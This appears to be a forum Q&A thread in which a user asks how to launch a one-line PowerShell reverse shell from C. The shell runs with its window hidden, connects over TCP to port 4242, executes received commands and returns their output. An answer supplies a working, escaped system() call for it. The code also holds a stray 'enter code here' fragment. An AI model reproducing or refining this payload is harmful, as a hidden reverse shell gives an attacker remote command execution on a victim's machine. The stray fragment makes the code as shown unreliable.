Python: how to run this one-line PowerShell reverse shell from C
I tried executing it as a system command, but C does not understand it when I pass the PowerShell command into system("").
PowerShell reverse shell:
powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
When I use this rev shell from Python with the subprocess module, it works fine when I pass it as subprocess.call("").
Please help me use this rev shell from C.
Answer: I'm not 100% sure, but a while ago I ran into a similar problem when executing a PowerShell script from C#. Maybe something similar applies in C. C# code:
Answer: Blindly pasting the PowerShell into system("") is not enough: every embedded " must be escaped with \:
system("powershell -W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
Comment: You should review that command: you probably don't want "enter code here" in it.